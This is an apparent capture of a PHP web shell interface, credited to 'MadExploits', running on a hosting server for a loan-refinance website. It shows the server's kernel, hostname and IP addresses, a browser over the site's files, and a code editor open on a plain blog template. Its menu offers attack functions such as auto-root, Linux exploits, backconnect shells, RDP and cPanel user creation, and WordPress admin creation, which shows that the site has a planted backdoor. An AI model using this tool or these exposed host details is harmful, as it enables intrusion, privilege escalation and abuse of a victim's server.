Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.17.165.223
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Refinance /
[ HOME SHELL ]
Name
Size
Permission
Action
calculator
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
about.php
1.6
KB
-rw-r--r--
apply-now.php
11.65
KB
-rw-r--r--
blog-single.php
2.91
KB
-rw-r--r--
blog.php
4.36
KB
-rw-r--r--
calculator.php
5.79
KB
-rw-r--r--
contact.php
4.18
KB
-rw-r--r--
faq.php
4.3
KB
-rw-r--r--
index.php
18.53
KB
-rw-r--r--
single-loan.php
5.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog.php
<?php include("includes/header.php");?> <div class="page-header"> <div class="container"> <div class="row"> <div class="col-md-12 text-center"> <h2>Blog</h2> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Blog</a></li> <li class="breadcrumb-item active" aria-current="page">Blog</li> </ol> </nav> </div> </div> </div> </div> <section class="latest-article-section section-padding"> <div class="container"> <div class="row"> <div class="col-md-4 col-lg-4"> <div class="single-article"> <div class="article-img"> <a href="#"><img src="./img/articale-1.jpg" alt=""></a> <div class="article-date"> <p>Feb 20, 2018</p> </div> </div> <a href="#"><h2>How to you can compare Pеrѕоnаl loans vеrѕuѕ car lоаnѕ</h2></a> </div> </div> <div class="col-md-4 col-lg-4"> <div class="single-article"> <div class="article-img"> <a href="#"><img src="./img/articale-2.jpg" alt=""></a> <div class="article-date"> <p>Feb 20, 2018</p> </div> </div> <a href="#"> <h2>Whаt should I need to do to gеt a реrѕоnаl loan very fast</h2></a> </div> </div> <div class="col-md-4 col-lg-4"> <div class="single-article"> <div class="article-img"> <a href="#"><img src="./img/articale-3.jpg" alt=""></a> <div class="article-date"> <p>Feb 20, 2018</p> </div> </div> <a href="#"> <h2>How you can direct add amount on loan principal to get more advantage </h2></a> </div> </div> <div class="col-md-4 col-lg-4"> <div class="single-article"> <div class="article-img"> <a href="#"><img src="./img/articale-3.jpg" alt=""></a> <div class="article-date"> <p>Feb 20, 2018</p> </div> </div> <a href="#"> <h2>How you can direct add amount on loan principal to get more advantage </h2></a> </div> </div> <div class="col-md-4 col-lg-4"> <div class="single-article"> <div class="article-img"> <a href="#"><img src="./img/articale-3.jpg" alt=""></a> <div class="article-date"> <p>Feb 20, 2018</p> </div> </div> <a href="#"> <h2>How you can direct add amount on loan principal to get more advantage </h2></a> </div> </div> </div> <div class="row ux-mid"> <ul class="pagination justify-content-center"> <li class="page-item"><a class="page-link" href="#"><i class="fas fa-angle-double-left"></i></a></li> <li class="page-item"><a class="page-link" href="#">1</a></li> <li class="page-item"><a class="page-link" href="#">2</a></li> <li class="page-item"><a class="page-link" href="#">3</a></li> <li class="page-item"><a class="page-link" href="#"><i class="fas fa-angle-double-right"></i></a></li> </ul> </div> </div> </section> <?php include("includes/footer.php");?>
Close